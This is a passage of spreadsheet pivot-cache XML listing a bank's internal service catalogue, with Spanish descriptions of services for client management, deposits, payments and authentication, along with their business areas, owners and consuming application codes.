    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Anexo Cinco"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio GestionAnexoCinco V1.0, permitirá a los canales digitales, generar el anexo5 del servicio digital y el anexo5 de restructuraciones y reservas que se realicen manualmente por el portal transaccional para poder realizar el registro de la garantía ante el Fondo Nacional de Garantias. "/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Jornadas"/>
    <x v="0"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <m/>
    <s v="Fondo Nacional de Garantias"/>
    <s v="AW1285001 _x000d__x000a_AW0856"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Archivo Recaudo"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio Gestión Archivo Recaudo permite gestionar los archivos del recaudador, como su anulación"/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <x v="4"/>
    <s v="Productor"/>
    <s v="Recaudos"/>
    <s v="Walter Andrés Gómez"/>
    <m/>
    <m/>
    <s v="PRODUCTORCONSUMIDOR _x000d__x000a_NU0084001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Autenticacion Fuerte"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio permite gestionar el proceso de enrolamiento de un cliente al sistema de autenticación fuerte de Bancolombia."/>
    <s v="CANALES_DIGITALES"/>
    <s v="Canales Digitales Personas"/>
    <x v="6"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <s v="AutenticacionFuertes"/>
    <s v="APIC _x000d__x000a_AW1177 _x000d__x000a_AW0937 _x000d__x000a_AW1287 _x000d__x000a_AW0856 _x000d__x000a_AW1313 _x000d__x000a_AW0638 _x000d__x000a_AW1170 _x000d__x000a_AW1128 _x000d__x000a_AW1203001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Autenticacion OAuth2"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Este servicio es el encargado de la gestión de autenticación Oauth2.0 configurado en WAS, en esta primera versión se tiene la operación cambiarCodigoAutorizacionPorToken que será la encargada de intercambiar el código de autorización por el token de acceso y en posteriores versiones se agregarán funcionalidades respecto a la autenticación OAuth2.0.&amp;"/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <x v="12"/>
    <s v="Productor"/>
    <s v="Gestión de Identidades"/>
    <s v="Mariluz Velasquez Suarez"/>
    <m/>
    <s v="FUA-Front Unico de Autenticación_AW1291001, Servicio genérico de autenticación _AW1160001"/>
    <s v="AW1281002 _x000d__x000a_NU0021001 _x000d__x000a_NU0143001 _x000d__x000a_NU0104001 _x000d__x000a_AW1333002 _x000d__x000a_AW1190001 _x000d__x000a_AW0453001 _x000d__x000a_NU0004001 _x000d__x000a_AW1128 _x000d__x000a_APICONNECT _x000d__x000a_AW1281003 _x000d__x000a_NU0035001 _x000d__x000a_AW1218001 _x000d__x000a_NU0046001 _x000d__x000a_AW1291001 _x000d__x000a_NU0094001 _x000d__x000a_NU0162001 _x000d__x000a_AW1277001 _x000d__x000a_DEVELOPSOATEST _x000d__x000a_NU0170001 _x000d__x000a_NU0199001 _x000d__x000a_AW1435001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Beneficiario"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio Gestión Beneficiario permitirá realizar la gestión sobre los beneficiarios de los pagadores, podrán realizar procesos de inscripción de beneficiarios y consultas, pueden ser beneficiario con cuenta en el banco u otras entidades, para pagos por lotes. Esté aplica para los recaudadores que prefieren por seguridad realizar pagos a beneficiarios ya inscritos, en caso de no estar inscrito el pago se rechazará. "/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <x v="4"/>
    <s v="Productor"/>
    <s v="Recaudos o Pagos"/>
    <m/>
    <m/>
    <m/>
    <s v="PRODUCTORCONSUMIDOR"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Clasificacion Riesgo"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Permite consultar la validación de las reglas LAFT a las personas o empresas que desean adquirir un producto o un servicio del Grupo Bancolombia, para garantizar un adecuado conocimiento de estos y cumplir con la normatividad expedida por la Superintendencia Financiera de Colombia y la normatividad SARLAF para identificar si esta persona es un potencial cliente del Grupo Bancolombia."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Riesgos"/>
    <x v="18"/>
    <s v="Productor"/>
    <s v="Ecosistema de Riesgo de Crédito"/>
    <s v="Juliana Medina Martinez"/>
    <m/>
    <m/>
    <s v="AW0611001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Clave Cliente"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio tiene como alcance la gestión, administración y consultas que se puedan realizar sobre la clave Banco o primera clave del cliente. Dentro de sus operaciones considera: una capacidad para el bloqueo de clave, otra para la consulta de novedades de cambio de clave y una última que se adiciona en esta nueva versión del servicio para consultar el estado y la existencia de clave banco."/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <x v="6"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <s v="PCC - Programas Comunes Canales_Generación y validación de pines_ISPCC0008"/>
    <s v="AW1170 _x000d__x000a_DEVELOPSOATEST _x000d__x000a_AW1185001 _x000d__x000a_NU0021001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Cliente"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio permite la creación y modificación de la información del cliente directamente en maestro de clientes del banco (MDM). Un proyecto que consuma el servicio puede crear un nuevo cliente en MDM, para la creación puede asignar información de atributos del cliente como lo son: Datos personales, datos de contacto, datos comerciales, datos de las relaciones del cliente, datos financieros y datos tributarios, así mismo un proyecto podrá modificar/actualizar la información de un cliente existente en el maestro da clientes del banco. Este servicio aplica tanto para persona jurídica, como para persona natural.  Este servicio no realiza la función de vinculación o desvinculación de clientes en el banco, este servicio se encuentra disponible es para la creación o modificación de clientes en MDM. Cuando un cliente es creado o actualizado a través de este servicio, será información que se convertirá en registro de oro del cliente, lo cual indica que podrá ser consultada por otros consumidores a través de los servicios de MDM de consulta del cliente. Cuando el cliente es creado o modificado en MDM se sincronizará en tiempo real con CRM y CIF."/>
    <s v="INFORMACION"/>
    <s v="MDM"/>
    <x v="17"/>
    <s v="Productor"/>
    <s v="MDM"/>
    <s v="Claudia Marcela Arias Orozco"/>
    <m/>
    <s v="MDM"/>
    <s v="AW1074001 _x000d__x000a_NU0254001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Cliente Giros"/>
    <n v="100"/>
    <x v="0"/>
    <s v="GestionClienteGiros ofrece a sus consumidores la posibilidad de consultar, actualizar y registrar un cliente en la aplicación de giros."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <x v="28"/>
    <s v="Productor"/>
    <s v="BALM"/>
    <s v="Monica Cecilia Gallego Rengifo"/>
    <m/>
    <s v="GIR-Giros Nacionales Multicanal_ISGIR001"/>
    <s v="AW1227001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Cliente Leasing"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio Gestión Cliente Leasing permitirá a los consumidores consultar y más adelante modificar información relacionada con los clientes de Leasing."/>
    <s v="LEASING"/>
    <s v="Leasing"/>
    <x v="20"/>
    <s v="Productor"/>
    <s v="Administración del ciclo de vida del activo"/>
    <s v="Juan Pablo Bahamon Betancur"/>
    <m/>
    <s v="_x000a__x000a_LEASING_AW1171001"/>
    <s v="AW0360006"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Cliente Pagador"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio Gestión Cliente Pagador permitirá realizar gestión sobre sus pagadores, la inscripción de un cliente pagador realizada a partir del nit y la consulta del cliente pagador, donde se podrán visualizar todos los parámetros de su inscripción."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <x v="4"/>
    <s v="Productor"/>
    <s v="Pagos"/>
    <s v="Doreley Estrada Ramirez"/>
    <m/>
    <m/>
    <s v="PRODUCTORCONSUMIDOR"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Cliente Pago Nomina"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio GestionClientePagoNomina permite a las pequeñas y grandes empresas, realizar su inscripción de cliente (persona natural o jurídica) al servicio de pago de nómina. Lo anterior con el fin de tener el registro de dicho cliente en el sistema de pagos para que posteriormente el cliente pueda realizar el pago de su nómina. Este servicio también permite consultar si el cliente se encuentra registrado en pago de nómina."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <x v="4"/>
    <s v="Productor"/>
    <s v="Pagos"/>
    <s v="Doreley Estrada Ramirez"/>
    <m/>
    <m/>
    <s v="AW1170"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Cliente Valores"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio GestionClienteValores permitirá a los consumidores realizar la creación de nuevos clientes en valores y/o modificar la información de un cliente ya existente."/>
    <s v="NEGOCIOS_DE_INVERSION"/>
    <s v="Valores"/>
    <x v="19"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="No Tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Codigo Autorizacion"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El código de autorización garantiza que un cliente se autenticó de forma exitosa._x000a_Este servicio permite generar un código de autorización con el que posteriormente se puede solicitar un token (sesión) para que los consumidores puedan tranzar en los diferentes aplicativos del banco. Se puede generar de dos formas; usando las credenciales cifradas del cliente (Cuando el Cliente se autentica) o a partir de un token existente (Single Sign ON) este último ocurre cuando se delega la sesión a un nuevo consumidor. _x000a_"/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <x v="12"/>
    <s v="Productor"/>
    <s v="Gestión de Identidades"/>
    <s v="Mariluz Velasquez Suarez"/>
    <m/>
    <s v="FUA-Front Unico de Autenticación_AW1291001, Servicio genérico de autenticación _AW1160001"/>
    <s v="AW1281002 _x000d__x000a_AW1128 _x000d__x000a_AW0955 _x000d__x000a_NU0051001 _x000d__x000a_AW0955001 _x000d__x000a_AW1291001 _x000d__x000a_AW1170 _x000d__x000a_DEVELOPSOATEST _x000d__x000a_NU0170001 _x000d__x000a_AW1435001 _x000d__x000a_NU0034001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Codigos Comercio Adquirencia"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio Gestión Códigos Comercio Adquirencia permitirá consultar y actualizar códigos de comercio únicos a nivel nacional y consultar radicados de solicitudes de afiliación para las tres franquicias Visa, Mastercard y Amex."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Aceptación de Pagos"/>
    <x v="15"/>
    <s v="Productor"/>
    <s v="Aceptación de Pagos"/>
    <s v="Alfredo Alonso Parra Laverde"/>
    <m/>
    <s v="ADQUIRENCIA MEDIOS DE PAGO_ISADQ0001"/>
    <s v="AW0856"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Comercios Adquirencia"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio Gestión Comercios Adquirencia permitirá a los consumidores inicialmente consultar y actualizar información de los comercios afiliados al producto adquirencia."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Aceptación de Pagos"/>
    <x v="15"/>
    <s v="Productor"/>
    <s v="Aceptación de Pagos"/>
    <s v="Alfredo Alonso Parra Laverde"/>
    <m/>
    <s v="ADQUIRENCIA MEDIOS DE PAGO_ISADQ0001"/>
    <s v="AW0856"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Comision Transferencias Externas"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio Gestion Comision Transferencias Externas tiene como objetivo realizar funcionalidades propias relacionadas con las comisiones que se cobran al momento de realizar una transferencia internacional para filiales del exterior."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <x v="0"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <m/>
    <s v="Finacle - F.E_Panama_AW0709001"/>
    <s v="AW1185001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Comisiones Filiales"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Este servicio tiene como objetivo obtener una comisión en específico. Se toman en cuenta todas las comisiones que se manejan en las Filiales del Exterior."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <x v="0"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <m/>
    <m/>
    <s v="AW1185001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Conciliacion Clientes"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio GestionConciliacionClientes, representa la virtualización en el WebSphere Message Broker (WMB) de una funcionalidad que expone el aplicativo de Gestión de Cobranzas ADMINFO para la validación de información requerida por parte de terceros sobre el abogado (aliado estratégico o empresa de cobranza) asociado al crédito que posea un cliente en condición de dificultad crediticia."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Transversales no iSeries"/>
    <x v="3"/>
    <s v="Productor Transversal"/>
    <s v="Los Federales"/>
    <s v="Ruben Dario Cardenas"/>
    <m/>
    <s v="Servicios Riesgos_NA_AW1086001"/>
    <s v="No Tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Conciliacion Clientes"/>
    <n v="110"/>
    <x v="0"/>
    <s v="El servicio GestionConciliacionClientes, representa la virtualización en el WebSphere Message Broker (WMB) de una funcionalidad que expone el aplicativo de Gestión de Cobranzas ADMINFO para la validación de información requerida por parte de terceros sobre el abogado (aliado estratégico o empresa de cobranza) asociado al crédito que posea un cliente en condición de dificultad crediticia."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Transversales no iSeries"/>
    <x v="3"/>
    <s v="Productor Transversal"/>
    <s v="Los Federales"/>
    <s v="Ruben Dario Cardenas"/>
    <m/>
    <s v="Servicios Riesgos_NA_AW1086001"/>
    <s v="AW1294001 _x000d__x000a_NU0021001 _x000d__x000a_Allus"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Cuenta Fly Pass"/>
    <n v="100"/>
    <x v="0"/>
    <s v=" El servicio GestionCuentaFlyPass tiene como Objetivo alojar algunas operaciones, que son necesarios para exponer una funcionalidad a la iniciativa de Recaudo Electrónico Vehicular, la cual expondrá la funcionalidad desde Data Power."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Debito y Prepago"/>
    <x v="9"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <m/>
    <s v="Modulo de Administración de Tarjetas (MAT)_Tarjeta débito_ISMAT0001"/>
    <s v="AW1150"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Cuentas ACH"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio Gestión Cuentas ACH tiene como objetivo realizar funcionalidades propias con las cuentas ACH que no tienen que ver con afectación monetaria, tales como inscripción de cuentas ACH, consultas de cuentas ACH, etc."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <x v="4"/>
    <s v="Productor"/>
    <s v="Captaciones"/>
    <m/>
    <m/>
    <m/>
    <s v="AW1170"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Cuentas AFC"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Las operaciones de este servicio son las que permiten hacer notificaciones al aplicativo AFC (caso de la apertura de la cuenta AFC en Finacle), o disminuir la operatividad del cajero en la oficina (caso de la grabación del Pate). "/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <x v="2"/>
    <s v="Productor Transversal"/>
    <s v="Depósitos"/>
    <s v="Maria Isabel Gutierrez"/>
    <m/>
    <s v="CUENTAS AFC_AW1110001"/>
    <s v="BVD _x000d__x000a_AW0210001 _x000d__x000a_AFC _x000d__x000a_AW1110001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Cuentas Deposito"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio Gestión Cuentas Deposito tiene como objetivo realizar funcionalidades propias con las cuentas de Depósitos, que no tienen que ver con afectación monetaria, tales como inscripción de cuentas, consultas de cuentas, etc."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <x v="2"/>
    <s v="Productor Transversal"/>
    <s v="Depósitos"/>
    <s v="Leidy Yurany Guarin Lopez"/>
    <m/>
    <s v="Depositós"/>
    <s v="No Tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Cuentas Depositos"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio permite la gestión (creación/modificación/eliminación) de cuentas de ahorro/corriente."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <x v="2"/>
    <s v="Productor Transversal"/>
    <s v="Depósitos"/>
    <s v="Leidy Yurany Guarin Lopez "/>
    <m/>
    <s v="Cuentas AFC_AW1110001"/>
    <s v="AFC _x000d__x000a_AW1110001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Datos Cliente Sufi"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Este servicio permite la actualización, creación de los datos generales de un cliente en sufi y otras operaciones relacionadas con la administración de los datos del cliente para esta versión solo queda especificada para la actualización de la información general. "/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <x v="11"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <m/>
    <s v="Servicio Web Cliente Sufi_AW1083001"/>
    <s v="AW1312001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion De Archivos"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio tiene varias funcionalidades, la primer es realizar la consulta del estado de un archivo enviado por un cliente para determinado convenio, la segunda permitirá realizar la visualización del detalle del archivo enviado por el cliente de los archivos (ejemplo: Novedades, Cobro y Facturación, Anulación, etc.), y la tercera funcionalidad es la de anulación de un lote (archivo) completo por parte del cliente, de los archivos (ejemplo: Novedades, Cobro y Facturación, Anulación, etc.)."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <x v="4"/>
    <s v="Productor"/>
    <s v="Recaudos o Pagos"/>
    <m/>
    <m/>
    <s v="Finacle Ent._Recaudos - Colombia_AW1065001"/>
    <s v="AW01065 _x000d__x000a_GDE _x000d__x000a_SVE"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion De Bolsillos"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Bolsillos Bancolombia permite separar los recursos de una cuenta de ahorros para mantener diferentes ahorros en bolsillos separados con una meta en específico, por ejemplo, ahorros para viajes, salud, alimentación, transporte etc.  El Servicio GestionDeBolsillos habilita las capacidades de gestión sobre los bolsillos de una cuenta de ahorros como, por ejemplo, crear o cancelar un bolsillo."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <x v="2"/>
    <s v="Productor"/>
    <s v="Depósitos"/>
    <s v="Lina María Giraldo Ceballos_x000a_Juan David Velasquez Velez"/>
    <m/>
    <m/>
    <s v="PRODUCTORCONSUMIDOR _x000d__x000a_NU0021001 _x000d__x000a_NU0146001 _x000d__x000a_NU0149001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion De Cuentas"/>
    <n v="110"/>
    <x v="0"/>
    <s v="El servicio GestionDeCuentas permite efectuar diversas operaciones sobre las cuentas de un cliente en su relación con el Banco."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <x v="2"/>
    <s v="Productor Transversal"/>
    <s v="Depósitos"/>
    <s v="Leidy Yurany Guarin Lopez"/>
    <m/>
    <m/>
    <s v="AW1177 _x000d__x000a_NU0104001 _x000d__x000a_AW1128 _x000d__x000a_AW1108001 _x000d__x000a_NU0170001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion De Cuentas Depositos"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El Servicio Gestión De Cuentas Depósitos habilita las capacidades relacionadas con la gestión administrativa de una cuenta de depósito como, por ejemplo: la apertura, cancelación, el bloqueo o desbloqueo de saldos de una cuenta en particular y la validación de pertinencia entre un cliente y una cuenta"/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <x v="2"/>
    <s v="Productor"/>
    <s v="Depósitos"/>
    <s v="Lina María Giraldo Ceballos_x000a_Juan David Velasquez Velez"/>
    <m/>
    <s v="Depositós"/>
    <s v="AW0360010 _x000d__x000a_NU0146001 _x000d__x000a_PRODUCTORCONSUMIDOR _x000d__x000a_NU0135001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion De Divisas"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio permitirá realizar la compra y venta de divisas con unas validaciones previas, se realizará la productización con el fin de permitir el consumo desde cualquier canal. "/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Comercio Exterior"/>
    <x v="0"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="DEVELOPSOATEST _x000d__x000a_PRODUCTORCONSUMIDOR"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion De Facturas"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio Gestión Facturas permitirá realizar gestión sobre sus facturas, podrá realizar la inscripción y la actualización."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <x v="4"/>
    <s v="Productor"/>
    <s v="Pagos"/>
    <s v="Doreley Estrada Ramirez"/>
    <m/>
    <m/>
    <s v="PRODUCTORCONSUMIDOR _x000d__x000a_DEVELOPSOATEST _x000d__x000a_NU0084001 _x000d__x000a_NU0051001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion De Pagos"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio Creación Pago permitirá la creación de un pago, proceso uno a uno. El pago deberá ser incluido al producto pagos como un lote, debe ser una cuenta origen Bancolombia y el destinatario podrá ser mismo banco u otros"/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <x v="4"/>
    <s v="Productor"/>
    <s v="Pagos"/>
    <s v="Doreley Estrada Ramirez"/>
    <m/>
    <m/>
    <s v="PRODUCTORCONSUMIDOR _x000d__x000a_NU0153001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion De Topes Montos Clientes"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Este servicio permite gestionar los topes que tiene un cliente. Los topes indican la cantidad de dinero que puede debitar dicho cliente durante el día.   Para esto, el servicio permitirá consultar el monto límite establecido por el cliente desde la sucursal virtual personas o los montos establecidos por el banco y permitirá tener un acumulado de las transacciones hechas por el cliente durante el día para poder determinar hasta que momento puede debitarse de sus cuentas."/>
    <s v="CANALES_DIGITALES"/>
    <s v="SOA y APIs"/>
    <x v="6"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <s v="PCC - Programas Comunes Canales_Generación y validación de pines_ISPCC0008"/>
    <s v="NU0014001 _x000d__x000a_AW1300001 _x000d__x000a_AW0955 _x000d__x000a_DEVELOPSOATEST _x000d__x000a_AW1277001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion De Topes Montos Clientes"/>
    <n v="200"/>
    <x v="0"/>
